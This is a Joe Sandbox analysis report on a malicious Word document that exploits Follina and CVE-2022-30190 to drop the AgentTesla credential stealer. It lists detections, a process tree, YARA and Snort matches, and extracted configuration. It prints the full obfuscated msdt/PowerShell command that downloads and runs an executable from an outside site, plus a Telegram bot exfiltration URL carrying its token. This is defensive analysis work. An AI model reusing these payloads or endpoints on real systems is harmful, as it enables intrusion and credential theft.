Edit tour

Windows Analysis Report
Payment copy_2911022.docx.doc

Overview

General Information

Sample Name:	Payment copy_2911022.docx.doc
Analysis ID:	770660
MD5:	cd3dbd5f1d468da826581361b619b393
SHA1:	9d5fc2d99aec7c8c18d8af7267b4a31801fda770
SHA256:	1c6189f068ee3870e1d41511bd55c02cef9d98a816a963a26f95ff0b6becea1f
Tags:	docdocx
Infos:

Detection

CVE-2021-40444, AgentTesla, Follina CVE-2022-30190

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected AgentTesla

Yara detected AntiVM3

Yara detected Microsoft Office Exploit Follina CVE-2022-30190

Detected CVE-2021-40444 exploit

Snort IDS alert for network traffic

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Telegram RAT

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for dropped file

Tries to steal Mail credentials (via file / registry access)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses the Telegram API (likely for C&C communication)

May check the online IP address of the machine

Injects a PE file into a foreign processes

.NET source code contains very large array initializations

Contains an external reference to another file

Hides that the sample has been downloaded from the Internet (zone.identifier)

Document exploit detected (process start blacklist hit)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

.NET source code references suspicious native API functions

.NET source code contains method to dynamically call methods (often used by packers)

Machine Learning detection for dropped file

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Antivirus or Machine Learning detection for unpacked file

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

JA3 SSL client fingerprint seen in connection with other malware

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Potential document exploit detected (unknown TCP traffic)

Drops PE files

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Compiles C# or VB.Net code

Dropped file seen in connection with other malware

Creates a process in suspended mode (likely to inject code)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Internet Provider seen in connection with other malware

Yara detected Credential Stealer

Found dropped PE file which has not been started or loaded

Potential document exploit detected (performs DNS queries)

IP address seen in connection with other malware

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Found inlined nop instructions (likely shell or obfuscated code)

PE file does not import any functions

Allocates memory with a write watch (potentially for evading sandboxes)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Potential document exploit detected (performs HTTP gets)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

WINWORD.EXE (PID: 2396 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)

MSOSYNC.EXE (PID: 860 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)

msdt.exe (PID: 4760 cmdline: C:\Windows\system32\msdt.exe" ms-msdt:/ID pcwdIAGNOstIC /SKIp fOrCe /PaRAm "it_rEBRowSEFoRFIlE=#6Aw IT_LaunchMethod=ContextMenu IT_BrowseForFile=4N0$(iEX($(iex('[SYsTeM.text.EnCoDIng]'+[cHAr]58+[chAR]0x3a+'uTf8.gEtString([SyStEm.CoNVErt]'+[chAR]58+[CHAR]0X3a+'FRoMBAse64sTriNg('+[Char]0X22+'U1RPcC1wUm9jRVNTIC1GT1JDZSAtTkFtZSAnbXNkdCc7JDggPSBBZGQtdFlQZSAtTUVtQkVyZEVGSU5pdGlPTiAnW0RsbEltcG9ydCgiVXJMTW9uLmRsbCIsIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgSkcsc3RyaW5nIFVXYSxzdHJpbmcgcFksdWludCBlYyxJbnRQdHIgcnEpOycgLU5BbUUgIlFDIiAtbmFNRVNwYUNFIGd1IC1QYXNzVGhydTsgJDg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHBzOi8vcHpzcmJsb2cuY29tL3dwLWNvbnRlbnQvdXBsb2Fkcy8yMDEyL1BST01ad0ZwMzg1dlhyTi5leGUiLCIkRW5WOkFQUERBVEFcUFJPTVp3RnAzODV2WHJOLmV4ZSIsMCwwKTtTdGFSVC1zbEVlcCgzKTtJbnZPa0UtSVRlbSAiJGVudjpBUFBEQVRBXFBST01ad0ZwMzg1dlhyTi5leGUiO3N0T3AtUFJPY2VTUyAtZk9SY0UgLW5hbWUgJ3NkaWFnbmhvc3Qn'+[chaR]0x22+'))'))))m3/../../../../../../../../../../../../../../../../.Exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)

csc.exe (PID: 348 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yjsbg2wl\yjsbg2wl.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)

cvtres.exe (PID: 524 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBBFF.tmp" "c:\Users\user\AppData\Local\Temp\yjsbg2wl\CSCC31FCDA79CE4E0C894720F359978C2.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)

csc.exe (PID: 1412 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zf01cjt2\zf01cjt2.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)

cvtres.exe (PID: 404 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC7C7.tmp" "c:\Users\user\AppData\Local\Temp\zf01cjt2\CSCBCE7B9C025BF4B8F8112717E4D466AA3.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)

csc.exe (PID: 4568 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mnm1snwx\mnm1snwx.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)

cvtres.exe (PID: 3620 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE5AF.tmp" "c:\Users\user\AppData\Local\Temp\mnm1snwx\CSCC987513427A042F884BC2F5ADDB1C11C.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)

PROMZwFp385vXrN.exe (PID: 5444 cmdline: "C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe" MD5: 65FACCEC1C27EA47BF295191E93BFF41)

PROMZwFp385vXrN.exe (PID: 1788 cmdline: {path} MD5: 65FACCEC1C27EA47BF295191E93BFF41)

PMoZbw.exe (PID: 3300 cmdline: "C:\Users\user\AppData\Roaming\PMoZbw\PMoZbw.exe" MD5: 65FACCEC1C27EA47BF295191E93BFF41)

cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot5187914704:AAHhM5YfeLYR_Ow0fgwMOZKO7je7btbh5DA/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5187914704:AAHhM5YfeLYR_Ow0fgwMOZKO7je7btbh5DA/sendMessage?chat_id=1673982758"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
document.xml.rels	EXPL_CVE_2021_40444_Document_Rels_XML	Detects indicators found in weaponized documents that exploit CVE-2021-40444	Jeremy Brown / @alteredbytes	0x3f8:$b1: /relationships/oleObject 0x412:$c1: Target="mhtml:http 0x45b:$c2: !x-usc:http 0x49f:$c3: TargetMode="External"

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.444972338.00000000030C0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security
00000013.00000002.642900479.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000013.00000002.642900479.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000013.00000002.642900479.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x3a3fc:$a13: get_DnsResolver 0x38b09:$a20: get_LastAccessed 0x3ae2a:$a27: set_InternalServerPort 0x3b15f:$a30: set_GuidMasterKey 0x38c1b:$a33: get_Clipboard 0x38c29:$a34: get_Keyboard 0x39ff6:$a35: get_ShiftKeyDown 0x3a007:$a36: get_AltKeyDown 0x38c36:$a37: get_Password 0x39751:$a38: get_PasswordHash 0x3a85e:$a39: get_DefaultCredentials
00000013.00000002.644029749.000000000411D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000013.00000002.644029749.000000000411D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000013.00000002.644029749.000000000411D000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x9953c:$a13: get_DnsResolver 0x97c49:$a20: get_LastAccessed 0x99f6a:$a27: set_InternalServerPort 0x9a29f:$a30: set_GuidMasterKey 0x97d5b:$a33: get_Clipboard 0x97d69:$a34: get_Keyboard 0x99136:$a35: get_ShiftKeyDown 0x99147:$a36: get_AltKeyDown 0x97d76:$a37: get_Password 0x98891:$a38: get_PasswordHash 0x9999e:$a39: get_DefaultCredentials
0000000F.00000002.581985407.0000000003F3D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000F.00000002.581985407.0000000003F3D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0000000F.00000002.581985407.0000000003F3D000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x62f0c:$a13: get_DnsResolver 0x9952c:$a13: get_DnsResolver 0x61619:$a20: get_LastAccessed 0x97c39:$a20: get_LastAccessed 0x6393a:$a27: set_InternalServerPort 0x99f5a:$a27: set_InternalServerPort 0x63c6f:$a30: set_GuidMasterKey 0x9a28f:$a30: set_GuidMasterKey 0x6172b:$a33: get_Clipboard 0x97d4b:$a33: get_Clipboard 0x61739:$a34: get_Keyboard 0x97d59:$a34: get_Keyboard 0x62b06:$a35: get_ShiftKeyDown 0x99126:$a35: get_ShiftKeyDown 0x62b17:$a36: get_AltKeyDown 0x99137:$a36: get_AltKeyDown 0x61746:$a37: get_Password 0x97d66:$a37: get_Password 0x62261:$a38: get_PasswordHash 0x98881:$a38: get_PasswordHash 0x6336e:$a39: get_DefaultCredentials
00000013.00000002.625883552.0000000003060000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000011.00000000.544511148.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000011.00000000.544511148.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000011.00000000.544511148.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x31cec:$a13: get_DnsResolver 0x303f9:$a20: get_LastAccessed 0x3271a:$a27: set_InternalServerPort 0x32a4f:$a30: set_GuidMasterKey 0x3050b:$a33: get_Clipboard 0x30519:$a34: get_Keyboard 0x318e6:$a35: get_ShiftKeyDown 0x318f7:$a36: get_AltKeyDown 0x30526:$a37: get_Password 0x31041:$a38: get_PasswordHash 0x3214e:$a39: get_DefaultCredentials
00000011.00000002.629534888.0000000003374000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000004.00000002.443928624.0000000002F08000.00000004.00000020.00020000.00000000.sdmp	SUSP_PS1_Msdt_Execution_May22	Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation	Nasreddine Bencherchali, Christian Burkard	0x96b6:$a: PCWDiagnostic 0x9f2e:$a: PCWDiagnostic 0x2dd0:$sa1: msdt.exe 0x9178:$sa1: msdt.exe 0x18f1e:$sa1: msdt.exe 0x21728:$sa1: msdt.exe 0x2173a:$sa3: ms-msdt 0x217fc:$sb3: IT_BrowseForFile= 0x21f58:$sb3: IT_BrowseForFile=
00000004.00000002.443928624.0000000002F08000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security
00000004.00000002.443795153.0000000002D90000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security
00000004.00000002.443908283.0000000002F00000.00000004.00000020.00020000.00000000.sdmp	SUSP_PS1_Msdt_Execution_May22	Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation	Nasreddine Bencherchali, Christian Burkard	0x585e:$a: PCWDiagnostic 0x1c94:$sa1: msdt.exe 0x1cd0:$sa1: msdt.exe 0x24bc:$sa1: msdt.exe 0x3bfd:$sa1: msdt.exe 0x1ce4:$sa3: ms-msdt 0x3c07:$sa3: ms-msdt 0x1da8:$sb3: IT_BrowseForFile= 0x3c69:$sb3: IT_BrowseForFile=
00000004.00000002.443908283.0000000002F00000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security
00000011.00000002.622387434.0000000003114000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.552178062.0000000002E7F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: msdt.exe PID: 4760	SUSP_PS1_Msdt_Execution_May22	Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation	Nasreddine Bencherchali, Christian Burkard	0x33f29:$a: PCWDiagnostic 0x47f1:$sa1: msdt.exe 0x92fb:$sa1: msdt.exe 0xc3ba:$sa1: msdt.exe 0xe560:$sa1: msdt.exe 0x129e0:$sa1: msdt.exe 0x17f20:$sa1: msdt.exe 0x1aed6:$sa1: msdt.exe 0x1db1c:$sa1: msdt.exe 0x228ee:$sa1: msdt.exe 0x258a4:$sa1: msdt.exe 0x30c27:$sa1: msdt.exe 0x460e7:$sa1: msdt.exe 0x47ab8:$sa1: msdt.exe 0x4a534:$sa1: msdt.exe 0x517cb:$sa1: msdt.exe 0x517e8:$sa1: msdt.exe 0x51bdd:$sa1: msdt.exe 0x54b2c:$sa1: msdt.exe 0x57ae2:$sa1: msdt.exe 0x5bb6f:$sa1: msdt.exe
Process Memory Space: PROMZwFp385vXrN.exe PID: 5444	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: PROMZwFp385vXrN.exe PID: 5444	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: PROMZwFp385vXrN.exe PID: 5444	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0xd913c:$a13: get_DnsResolver 0xd7aa9:$a20: get_LastAccessed 0xd9b19:$a27: set_InternalServerPort 0xd9d80:$a30: set_GuidMasterKey 0xd7ba4:$a33: get_Clipboard 0xd7bb2:$a34: get_Keyboard 0xd8dd2:$a35: get_ShiftKeyDown 0xd8de3:$a36: get_AltKeyDown 0xd7bbf:$a37: get_Password 0xd8636:$a38: get_PasswordHash 0xd9572:$a39: get_DefaultCredentials
Process Memory Space: PROMZwFp385vXrN.exe PID: 1788	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: PROMZwFp385vXrN.exe PID: 1788	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: PROMZwFp385vXrN.exe PID: 1788	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PROMZwFp385vXrN.exe PID: 1788	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x136b1:$a13: get_DnsResolver 0x1201e:$a20: get_LastAccessed 0x1408e:$a27: set_InternalServerPort 0x142f5:$a30: set_GuidMasterKey 0x12119:$a33: get_Clipboard 0x12127:$a34: get_Keyboard 0x13347:$a35: get_ShiftKeyDown 0x13358:$a36: get_AltKeyDown 0x12134:$a37: get_Password 0x12bab:$a38: get_PasswordHash 0x13ae7:$a39: get_DefaultCredentials
Process Memory Space: PMoZbw.exe PID: 3300	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: PMoZbw.exe PID: 3300	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: PMoZbw.exe PID: 3300	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x94a8:$a13: get_DnsResolver 0x22ab7:$a13: get_DnsResolver 0x7e15:$a20: get_LastAccessed 0x21424:$a20: get_LastAccessed 0x9e85:$a27: set_InternalServerPort 0x23494:$a27: set_InternalServerPort 0xa0ec:$a30: set_GuidMasterKey 0x236fb:$a30: set_GuidMasterKey 0x7f10:$a33: get_Clipboard 0x2151f:$a33: get_Clipboard 0x7f1e:$a34: get_Keyboard 0x2152d:$a34: get_Keyboard 0x913e:$a35: get_ShiftKeyDown 0x2274d:$a35: get_ShiftKeyDown 0x914f:$a36: get_AltKeyDown 0x2275e:$a36: get_AltKeyDown 0x7f2b:$a37: get_Password 0x2153a:$a37: get_Password 0x89a2:$a38: get_PasswordHash 0x21fb1:$a38: get_PasswordHash 0x98de:$a39: get_DefaultCredentials
Click to see the 30 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
19.2.PMoZbw.exe.3ee9510.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
19.2.PMoZbw.exe.3ee9510.1.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
19.2.PMoZbw.exe.3ee9510.1.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32c2b:$s10: logins 0x326a5:$s11: credential 0x2e90b:$g1: get_Clipboard 0x2e919:$g2: get_Keyboard 0x2e926:$g3: get_Password 0x2fcd6:$g4: get_CtrlKeyDown 0x2fce6:$g5: get_ShiftKeyDown 0x2fcf7:$g6: get_AltKeyDown
19.2.PMoZbw.exe.3ee9510.1.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x300ec:$a13: get_DnsResolver 0x2e7f9:$a20: get_LastAccessed 0x30b1a:$a27: set_InternalServerPort 0x30e4f:$a30: set_GuidMasterKey 0x2e90b:$a33: get_Clipboard 0x2e919:$a34: get_Keyboard 0x2fce6:$a35: get_ShiftKeyDown 0x2fcf7:$a36: get_AltKeyDown 0x2e926:$a37: get_Password 0x2f441:$a38: get_PasswordHash 0x3054e:$a39: get_DefaultCredentials
15.2.PROMZwFp385vXrN.exe.3f6e020.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
15.2.PROMZwFp385vXrN.exe.3f6e020.1.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
15.2.PROMZwFp385vXrN.exe.3f6e020.1.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x32c2b:$s10: logins 0x326a5:$s11: credential 0x2e90b:$g1: get_Clipboard 0x2e919:$g2: get_Keyboard 0x2e926:$g3: get_Password 0x2fcd6:$g4: get_CtrlKeyDown 0x2fce6:$g5: get_ShiftKeyDown 0x2fcf7:$g6: get_AltKeyDown
15.2.PROMZwFp385vXrN.exe.3f6e020.1.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x300ec:$a13: get_DnsResolver 0x2e7f9:$a20: get_LastAccessed 0x30b1a:$a27: set_InternalServerPort 0x30e4f:$a30: set_GuidMasterKey 0x2e90b:$a33: get_Clipboard 0x2e919:$a34: get_Keyboard 0x2fce6:$a35: get_ShiftKeyDown 0x2fcf7:$a36: get_AltKeyDown 0x2e926:$a37: get_Password 0x2f441:$a38: get_PasswordHash 0x3054e:$a39: get_DefaultCredentials
19.2.PMoZbw.exe.3ee9510.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
19.2.PMoZbw.exe.3ee9510.1.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
19.2.PMoZbw.exe.3ee9510.1.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x34a2b:$s10: logins 0x344a5:$s11: credential 0x3070b:$g1: get_Clipboard 0x30719:$g2: get_Keyboard 0x30726:$g3: get_Password 0x31ad6:$g4: get_CtrlKeyDown 0x31ae6:$g5: get_ShiftKeyDown 0x31af7:$g6: get_AltKeyDown
19.2.PMoZbw.exe.3ee9510.1.raw.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x31eec:$a13: get_DnsResolver 0x305f9:$a20: get_LastAccessed 0x3291a:$a27: set_InternalServerPort 0x32c4f:$a30: set_GuidMasterKey 0x3070b:$a33: get_Clipboard 0x30719:$a34: get_Keyboard 0x31ae6:$a35: get_ShiftKeyDown 0x31af7:$a36: get_AltKeyDown 0x30726:$a37: get_Password 0x31241:$a38: get_PasswordHash 0x3234e:$a39: get_DefaultCredentials
17.0.PROMZwFp385vXrN.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
17.0.PROMZwFp385vXrN.exe.400000.0.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
17.0.PROMZwFp385vXrN.exe.400000.0.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x34a2b:$s10: logins 0x344a5:$s11: credential 0x3070b:$g1: get_Clipboard 0x30719:$g2: get_Keyboard 0x30726:$g3: get_Password 0x31ad6:$g4: get_CtrlKeyDown 0x31ae6:$g5: get_ShiftKeyDown 0x31af7:$g6: get_AltKeyDown
17.0.PROMZwFp385vXrN.exe.400000.0.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x31eec:$a13: get_DnsResolver 0x305f9:$a20: get_LastAccessed 0x3291a:$a27: set_InternalServerPort 0x32c4f:$a30: set_GuidMasterKey 0x3070b:$a33: get_Clipboard 0x30719:$a34: get_Keyboard 0x31ae6:$a35: get_ShiftKeyDown 0x31af7:$a36: get_AltKeyDown 0x30726:$a37: get_Password 0x31241:$a38: get_PasswordHash 0x3234e:$a39: get_DefaultCredentials
15.2.PROMZwFp385vXrN.exe.3f6e020.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
15.2.PROMZwFp385vXrN.exe.3f6e020.1.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
15.2.PROMZwFp385vXrN.exe.3f6e020.1.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x34a2b:$s10: logins 0x6b04b:$s10: logins 0x344a5:$s11: credential 0x6aac5:$s11: credential 0x3070b:$g1: get_Clipboard 0x66d2b:$g1: get_Clipboard 0x30719:$g2: get_Keyboard 0x66d39:$g2: get_Keyboard 0x30726:$g3: get_Password 0x66d46:$g3: get_Password 0x31ad6:$g4: get_CtrlKeyDown 0x680f6:$g4: get_CtrlKeyDown 0x31ae6:$g5: get_ShiftKeyDown 0x68106:$g5: get_ShiftKeyDown 0x31af7:$g6: get_AltKeyDown 0x68117:$g6: get_AltKeyDown
15.2.PROMZwFp385vXrN.exe.3f6e020.1.raw.unpack	Windows_Trojan_AgentTesla_d3ac2b2f	unknown	unknown	0x31eec:$a13: get_DnsResolver 0x6850c:$a13: get_DnsResolver 0x305f9:$a20: get_LastAccessed 0x66c19:$a20: get_LastAccessed 0x3291a:$a27: set_InternalServerPort 0x68f3a:$a27: set_InternalServerPort 0x32c4f:$a30: set_GuidMasterKey 0x6926f:$a30: set_GuidMasterKey 0x3070b:$a33: get_Clipboard 0x66d2b:$a33: get_Clipboard 0x30719:$a34: get_Keyboard 0x66d39:$a34: get_Keyboard 0x31ae6:$a35: get_ShiftKeyDown 0x68106:$a35: get_ShiftKeyDown 0x31af7:$a36: get_AltKeyDown 0x68117:$a36: get_AltKeyDown 0x30726:$a37: get_Password 0x66d46:$a37: get_Password 0x31241:$a38: get_PasswordHash 0x67861:$a38: get_PasswordHash 0x3234e:$a39: get_DefaultCredentials
Click to see the 15 entries

Snort Signatures

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	192.168.2.5149.154.167.220497254432851779 12/20/22-14:16:47.588535
SID:	2851779
Source Port:	49725
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	192.168.2.5149.154.167.220497284432851779 12/20/22-14:16:51.990077
SID:	2851779
Source Port:	49728
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Payment copy_2911022.docx.doc	ReversingLabs: Detection: 41%
Source: Payment copy_2911022.docx.doc	Virustotal: Detection: 46%			Perma Link

Antivirus / Scanner detection for submitted sample

Source: Payment copy_2911022.docx.doc

Avira: detected

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\PMoZbw\PMoZbw.exe

ReversingLabs: Detection: 37%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\PMoZbw\PMoZbw.exe

Joe Sandbox ML: detected

Source: 17.0.PROMZwFp385vXrN.exe.400000.0.unpack

Avira: Label: TR/Spy.Gen8

Source: 15.2.PROMZwFp385vXrN.exe.3f6e020.1.raw.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5187914704:AAHhM5YfeLYR_Ow0fgwMOZKO7je7btbh5DA/sendMessage?chat_id=1673982758"}
Source: PROMZwFp385vXrN.exe.1788.17.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5187914704:AAHhM5YfeLYR_Ow0fgwMOZKO7je7btbh5DA/sendMessage"}

Exploits

Yara detected Microsoft Office Exploit Follina CVE-2022-30190

Source: Yara match	File source: 00000004.00000002.444972338.00000000030C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.443928624.0000000002F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.443795153.0000000002D90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.443908283.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Detected CVE-2021-40444 exploit

Source: document.xml.rels

Extracted files from sample: mhtml:https://pzsrblog.com/wp-content/uploads/2012/promzwfp385vxr!x-usc:https://pzsrblog.com/wp-content/uploads/2012/promzwfp385vxr

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 118.27.125.229:443 -> 192.168.2.5:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 118.27.125.229:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 118.27.125.229:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.185.227.156:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.185.227.156:443 -> 192.168.2.5:49727 version: TLS 1.2

Source:	Binary string: oI4HW.pdbh' source: PROMZwFp385vXrN.exe, 0000000F.00000000.476154274.00000000007B2000.00000002.00000001.01000000.0000000B.sdmp, PMoZbw.exe.17.dr
Source:	Binary string: oI4HW.pdb source: PROMZwFp385vXrN.exe, 0000000F.00000000.476154274.00000000007B2000.00000002.00000001.01000000.0000000B.sdmp, PMoZbw.exe.17.dr

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Process created: C:\Windows\SysWOW64\msdt.exe

Source: global traffic	TCP traffic: 192.168.2.5:49701 -> 118.27.125.229:443
